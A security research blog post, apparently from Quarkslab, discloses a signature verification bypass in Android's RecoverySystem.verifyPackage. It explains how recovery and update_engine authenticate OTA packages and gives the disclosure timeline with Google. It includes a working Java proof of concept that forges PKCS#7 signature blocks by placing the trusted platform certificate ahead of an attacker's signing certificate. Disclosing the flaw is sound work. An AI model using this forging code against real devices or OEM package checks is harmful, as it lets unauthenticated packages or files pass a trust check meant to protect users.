A signature verification bypass in a function that verifies the integrity of ZIP archives in the AOSP framework

Introduction

In this post, we will explore how OTA package authentication works in Android. We will not go into the full details of the update process, as it is quite complex. Instead, we will focus on gaining a high-level understanding of the key system components involved and where the authentication takes place.

First, the update client has to download the update package, which can be either legacy or AB (taking advantage of the AB partition mechanism). AB packages can be streamable or not, but the authentication works the same. In both cases, the package downloaded by the update client is a signed ZIP archive with the signature block in the comment section. The OTA client must authenticate the package the first time by using RecoverySystem.verifyPackage before extracting and parsing its metadata.

If the OTA is a legacy non-AB OTA package (and the device supports it), the client can simply call RecoverySystem.installPackage to hand it over to the recovery via a parameter in the Bootloader Control Block (BCB) and reboot. If the OTA is an AB OTA package (and the device supports it), the client must query the update_engine service through an API, defined in the corresponding Android Interface Definition Language (AIDL) file, to first allocate space for the update (IUpdateEngine.allocateSpaceForPayload) and then apply it (IUpdateEngine.applyPayload) to the available AB slot.

GmsCore is one of such clients on devices that use Google Play Services and it follows these guidelines. Each OEM firmware has to implement some variation of this process.

We suggest checking the Android documentation for the details.

VerifyPackage

The function android.os.RecoverySystem.verifyPackage, whose purpose is to verify the integrity of a ZIP archive, was intended to perform a first verification of an update package before handing it either to the recovery or to the update_engine, which would verify it again.

This function assesses that the ZIP archive contains a DER encoded signature block in the comment section, that the archive content (excluding the comment section) matches the digest in the signature block, and that the signing certificate is trusted by the platform. The issue lies in the fact that the function verifies that the block contains the certificate but not that it is the one used for signing, and this weakness can be exploited to reliably craft signature blocks passing this verification without knowing the trusted certificate's associated private key.

In this first snippet, we see that the signature block is parsed using sun.security.pkcs.PKCS7 and that signatureKey comes from the first certificate of the block (certificates[0]) . This key is compared to the trusted certificates' public keys, and an exception is thrown if none match.

// Parse the signature
PKCS7 block =
    new PKCS7(new ByteArrayInputStream(eocd, commentSize+22-signatureStart, signatureStart));

// Take the first certificate from the signature (packages
// should contain only one).
X509Certificate[] certificates = block.getCertificates();
if (certificates == null || certificates.length == 0) {
    throw new SignatureException("signature contains no certificates");
}
X509Certificate cert = certificates[0];
PublicKey signatureKey = cert.getPublicKey();

SignerInfo[] signerInfos = block.getSignerInfos();
if (signerInfos == null || signerInfos.length == 0) {
    throw new SignatureException("signature contains no signedData");
}
SignerInfo signerInfo = signerInfos[0];

// Check that the public key of the certificate is contained
// in the package equals one of our trusted public keys.
boolean verified = false;
HashSet<X509Certificate> trusted = getTrustedCerts(
    deviceCertsZipFile == null ? DEFAULT_KEYSTORE : deviceCertsZipFile);
for (X509Certificate c : trusted) {
    if (c.getPublicKey().equals(signatureKey)) {
        verified = true;
        break;
    }
}
if (!verified) {
    throw new SignatureException("signature doesn't match any trusted key");
}

However, we will see that the assumption that "packages should contain only one certificate" is wrong and that the signing certificate doesn't necessarily have to be the first one. Here, the function calls block.verify, which performs the signature and integrity checks.

SignerInfo verifyResult = block.verify(signerInfo, new InputStream() {
    // The signature covers all of the OTA package except the
    // archive comment and its 2-byte length.
    long toRead = fileLen - commentSize - 2;
    long soFar = 0;

    int lastPercent = 0;
    long lastPublishTime = startTimeMillis;

    @Override
    public int read() throws IOException {
        throw new UnsupportedOperationException();
    }

    @Override
    public int read(byte[] b, int off, int len) throws IOException {
        if (soFar >= toRead) {
            return -1;
        }
        if (Thread.currentThread().isInterrupted()) {
            return -1;
        }

        int size = len;
        if (soFar + size > toRead) {
            size = (int)(toRead - soFar);
        }
        int read = raf.read(b, off, size);
        soFar += read;

        if (listenerForInner != null) {
            long now = System.currentTimeMillis();
            int p = (int)(soFar * 100 / toRead);
            if (p > lastPercent &&
                now - lastPublishTime > PUBLISH_PROGRESS_INTERVAL_MS) {
                lastPercent = p;
                lastPublishTime = now;
                listenerForInner.onProgress(lastPercent);
            }
        }

        return read;
    }
});

libcore implementation of SignerInfo verify function recovers the signing certificate from the block with getCertificate, using the serial and issuer. getCertificate iterates over the certificates contained in the block to find the right one, meaning it can be in any position for verify to succeed.

X509Certificate cert = getCertificate(block);
PublicKey key = cert.getPublicKey();
if (cert == null) {
    return null;
}
Signature sig = Signature.getInstance(algname);
sig.initVerify(key);
public X509Certificate getCertificate(PKCS7 block)
    throws IOException
{
    return block.getCertificate(certificateSerialNumber, issuerName);
}
public X509Certificate getCertificate(BigInteger serial, X500Name issuerName) {
    if (certificates != null) {
        if (certIssuerNames == null)
            populateCertIssuerNames();
        for (int i = 0; i < certificates.length; i++) {
            X509Certificate cert = certificates[i];
            BigInteger thisSerial = cert.getSerialNumber();
            if (serial.equals(thisSerial)
                && issuerName.equals(certIssuerNames[i]))
            {
                return cert;
            }
        }
    }
    return null;
}

Finally, the block certificate section is an ASN.1 SET OF that can indeed contain multiple objects, and there is nothing in the libcore parser that prevents doing so, nor is there any constraint on them (like being part of the certificate chain).

Here is an example of code producing a signed package using the same implementation. When encoding the block, the certificates are sorted in the SET OF, and the first distinguishing field in the encoded certificate is its content size. So to make sure the signing certificate is the second one (so that the expected/platform one comes first), make one with a very large subject.

public static byte[] sign(byte[] data) {
    if (data == null) {
        data = Base64.getDecoder().decode(ZIP_DATA);
    }
    try {
        Class<?> pkcs7Class = Sign.class.getClassLoader().loadClass("sun.security.pkcs.PKCS7");
        Class<?> contentInfoClass = Sign.class.getClassLoader().loadClass("sun.security.pkcs.ContentInfo");
        Class<?> objIdClass = Sign.class.getClassLoader().loadClass("sun.security.util.ObjectIdentifier");
        Class<?> derValClass = Sign.class.getClassLoader().loadClass("sun.security.util.DerValue");
        Class<?> signerInfoClass = Sign.class.getClassLoader().loadClass("sun.security.pkcs.SignerInfo");
        Class<?> algIdClass = Sign.class.getClassLoader().loadClass("sun.security.x509.AlgorithmId");
        Class<?> x500NameClass = Sign.class.getClassLoader().loadClass("sun.security.x509.X500Name");

        X509Certificate platform = getCertificate(PLATFORM_CERT);
        X509Certificate signing = getCertificate(SIGNING_CERT);
        PrivateKey key = getPrivateKey(SIGNING_KEY);

        byte[] toSign = Arrays.copyOfRange(data, 0, data.length - 2);
        byte[] signature = null;

        try {
            Signature privateSignature = Signature.getInstance("SHA256withRSA");
            privateSignature.initSign(key);
            privateSignature.update(toSign);
            signature = privateSignature.sign();
        } catch (Exception e) {
            Log.e(TAG, "exception", e);
        }

        Object hashAlg = algIdClass.getMethod("get", String.class).invoke(null, "SHA-256");
        Object encAlg = algIdClass.getMethod("get", String.class).invoke(null, "RSA");
        Object issuer = x500NameClass.getConstructor(String.class).newInstance(signing.getIssuerX500Principal().getName());
        Object serial = signing.getSerialNumber();
        Object signer = signerInfoClass.getConstructor(x500NameClass, BigInteger.class, algIdClass, algIdClass, byte[].class).newInstance(issuer, serial, hashAlg, encAlg, signature);

        int[] sdata = {1, 2, 840, 113549, 1, 7, 2};
        Object contentInfo = contentInfoClass.getConstructor(objIdClass, derValClass).newInstance(objIdClass.getMethod("newInternal", sdata.getClass()).invoke(null, sdata), null);
        Object digestAlgIds = Array.newInstance(algIdClass, 1);
        Array.set(digestAlgIds, 0, hashAlg);
        X509Certificate[] certs = new X509Certificate[]{audit, signing};
        X509CRL[] crls = new X509CRL[]{};
        Object signers = Array.newInstance(signerInfoClass, 1);
        Array.set(signers, 0, signer);

        Object pkcs = pkcs7Class.getConstructor(digestAlgIds.getClass(), contentInfo.getClass(), certs.getClass(), crls.getClass(), signers.getClass()).newInstance(digestAlgIds, contentInfo, certs, null, signers);

        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        pkcs7Class.getMethod("encodeSignedData", OutputStream.class).invoke(pkcs, baos);

        byte[] sigBlock = baos.toByteArray();

        int commentSize = sigBlock.length + 6;
        int sigStart = commentSize;
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        out.write(toSign);
        out.write(new byte[]{(byte)(commentSize & 0xff), (byte)((commentSize >> 8) & 0xff)});
        out.write(sigBlock);
        out.write(new byte[]{(byte)(sigStart & 0xff), (byte)((sigStart >> 8) & 0xff), (byte) 0xff, (byte) 0xff, (byte)(commentSize & 0xff), (byte)((commentSize >> 8) & 0xff)});

        byte[] bytes = out.toByteArray();
        Log.e(TAG, "Block size: " + String.valueOf(sigBlock.length));
        Object test = pkcs7Class.getConstructor(bytes.getClass()).newInstance(sigBlock);
        certs = (X509Certificate[]) pkcs7Class.getMethod("getCertificates").invoke(test);
        Log.e(TAG, "Certs match: " + String.valueOf(certs[0].equals(platform)));

        return bytes;
    } catch (Exception e) {
        Log.e(TAG, "exception", e);
    }
    return null;
}

Authentication in the recovery

The authentication process of the package in the recovery works pretty much the same as RecoverySystem.verifyPackage since the package is handed over as is by the client. The work is done in the verify_file function, called by VerifyAndInstallPackage right at the beginning of the install process. This function recovers the 6 bytes footer at the end of the archive (in the comment section) and uses it to find the EOCD (file length - (comment size + 22)): signature block offset (2 bytes, little endian) || 0xff 0xff || comment size (2 bytes, little endian) First, it verifies that the EOCD is there by comparing the first 4 bytes with the EOCD magic, and checks that there is no other EOCD magic after it in the file. This is very important because the package is later handled with libziparchive, which locates the EOCD by searching for the magic backward from the end of the file. Without this check, one could have the footer point to a fake EOCD record in a file entry, leading the authentication process to authenticate only part of the file (up to the fake record) and allowing them to add content to a legitimate package. Then, it calculates a SHA-1 and a SHA-256 hash of the full content of the archive (excluding the comment section and its size). The encrypted hash is extracted from the signature block using a minimalistic ASN.1 parser. This sound and simple parser only cares for the first SignerInfo entry, consumes data one byte at a time, and verifies sizes at each step of the way. Finally, it iterates over the platform public keys and calls libssl RSA_verify/ECDSA_verify with the calculated hash, the signature block encrypted hash, and the trusted key. The verification is a success only if one of the trusted keys can public-decrypt the hash and it matches the calculated one. All in all, despite having the same aim, the recovery implementation of the authentication doesn't share the shortcomings of the implementation in the Android framework, and legacy OTA packages exploiting the vulnerability would be stopped there without doing any damage.

Simple version of PKCS#7 SignedData extraction. This extracts the
signature OCTET STRING to be used for signature verification.

For full details, see http://www.ietf.org/rfc/rfc3852.txt

The PKCS#7 structure looks like:

  SEQUENCE (ContentInfo)
    OID (ContentType)
    [0] (content)
      SEQUENCE (SignedData)
        INTEGER (version CMSVersion)
        SET (DigestAlgorithmIdentifiers)
        SEQUENCE (EncapsulatedContentInfo)
        [0] (CertificateSet OPTIONAL)
        [1] (RevocationInfoChoices OPTIONAL)
        SET (SignerInfos)
          SEQUENCE (SignerInfo)
            INTEGER (CMSVersion)
            SEQUENCE (SignerIdentifier)
            SEQUENCE (DigestAlgorithmIdentifier)
            SEQUENCE (SignatureAlgorithmIdentifier)
            OCTET STRING (SignatureValue)

Authentication in update_engine

The authentication of AB OTA packages in update_engine works totally differently. The update client extracts a binary payload from the archive, and it is this payload that is handed to the update_engine (in the case of a streamed update, the update_engine can also download it directly). The payload is composed of a signed metadata section at the start, followed by the operations data. The metadata section starts with a few header values: {'C', 'r', 'A', 'U'} (4 bytes) || version (8 bytes) || manifest size (8 bytes) || signature size (4 bytes) This is followed by the manifest and the signature block. The authentication happens in the DeltaPerformer::Write function. It first reads the header values (PayloadMetadata::ParsePayloadHeader) and verifies them (magic is there, metadata size doesn't exceed the payload size, etc.). It then verifies the signature (PayloadMetadata::ValidateMetadataSignature). The signature block is read, the payload metadata up to the beginning of the signature block is hashed with SHA-256 (which includes the headers and the manifest), and both hash and signature data are handed to PayloadVerifier::VerifySignature. The signature block, which is a protobuf message, is parsed:

message Signatures {
  message Signature {
    optional uint32 version = 1 [deprecated = true];
    optional bytes data = 2;

    // The DER encoded signature size of EC keys is nondeterministic for
    // different input of sha256 hash. However, we need the size of the
    // serialized signatures protobuf string to be fixed before signing;
    // because this size is part of the content to be signed. Therefore, we
    // always pad the signature data to the maximum possible signature size of
    // a given key. And the payload verifier will truncate the signature to
    // its correct size based on the value of |unpadded_signature_size|.
    optional fixed32 unpadded_signature_size = 3;
  }
  repeated Signature signatures = 1;
}

The signature verification itself is a bit unusual. For each signature in the block (or at least until one verifies), instead of using RSA_verify, the signature data is put through RSA_public_decrypt with the candidate platform public key, and the result is compared to the "manually" PKCS1-v1.5 padded calculated hash. This only happens for RSA platform keys, for EC keys, ECDSA_verify is used. This looks fine nonetheless. If the signature verification succeeds, the manifest is parsed (also a protobuf message) and the installation proceeds. The manifest contains the list of operations to perform on the partitions to update. These operations can require data from the data part of the payload, and in that case, this data is verified against a SHA-256 hash in the signed manifest (for each operation).

The payload is duly authenticated, but GmsCore extracts another file from the original package, the care_map. This is yet another protobuf message, and this one is not authenticated. It is used by the update_verifier when the device reboots and contains a bunch of block ranges.

One last thing about the update engine. The update process doesn't seem to be interrupted upon authentication/integrity verification failure if ro.secure is 0. I put that here, and third-party/rooted ROMs providers might want to have a look.

  install_plan_.hash_checks_mandatory = hardware_->IsOfficialBuild();
  if (*error != ErrorCode::kSuccess) {
    if (install_plan_->hash_checks_mandatory) {
      // The autoupdate_CatchBadSignatures test checks for this string
      // in log-files. Keep in sync.
      LOG(ERROR) << "Mandatory metadata signature validation failed";
      return MetadataParseResult::kError;
    }

    // For non-mandatory cases, just send a UMA stat.
    LOG(WARNING) << "Ignoring metadata signature validation failures";
    *error = ErrorCode::kSuccess;
  }

Conclusion

The consequence of a failure to properly authenticate an OTA package could be dire. It can range from patching a partition not protected by AVB/verity to enabling remote code execution via post-install scripts. Although the vulnerability in verifyPackage may not seem like a major issue—assuming OEM firmware OTA clients are correctly implemented—a malicious package can still pass the first line of defense before being blocked by the recovery or the update_engine.

However, some OEM and third-party applications have used verifyPackage in the past to authenticate other types of packages—such as bundles of APKs, configuration files, and more—and that may still be the case today. Note that this function has probably always been vulnerable, and it remains so today.

Disclosure Timeline

We reported this vulnerability to Google. Below we include a timeline of all the relevant events during the coordinated vulnerability disclosure process with the intent of providing transparency to the whole process and our actions.

  • 2024-01-18 Quarkslab reported the vulnerability in Google's bug tracker.
  • 2024-01-19 Vulnerability acknowledged by Google. They ask further information about disclosure.
  • 2024-01-19 Quarkslab explained that the bug was found during a security assessment for a customer so it was known by them, although under NDA.
  • 2024-01-22 Google requested a complete but minimal PoC which reproduces the issue on the latest Android U build.
  • 2024-02-05 Quarkslab provided a PoC to Google.
  • 2024-02-06 Google acknowledged the POC and indicated that they would be following their standard investigation and remediation process.
  • 2024-02-14 Google requested additional information.
  • 2024-02-19 Quarkslab sent step by step information to reproduce the bug.
  • 2024-02-20 Quarkslab sent further details including device fingerprint of an exploited device and logcat output.
  • 2024-02-20 Google acknowledged the data sent and indicated that they would be following their standard investigation and remediation process.
  • 2024-03-08 Quarkslab asked for an update.
  • 2024-03-08 Google said they did not have an update at the moment.
  • 2025-03-12 Google indicated the vulnerability was rated as Moderate severity. They indicated that, as moderate severity vulnerabilities are typically addressed in a potential upcoming release, they were closing the report and were not going to provide further updates.
  • 2025-03-21 Google set the Status field of the bug entry in the bug tracker as "Won't Fix (Infeasible)".
  • 2025-04-08 This blog post was published.

If you would like to learn more about our security audits and explore how we can help you, get in touch with us!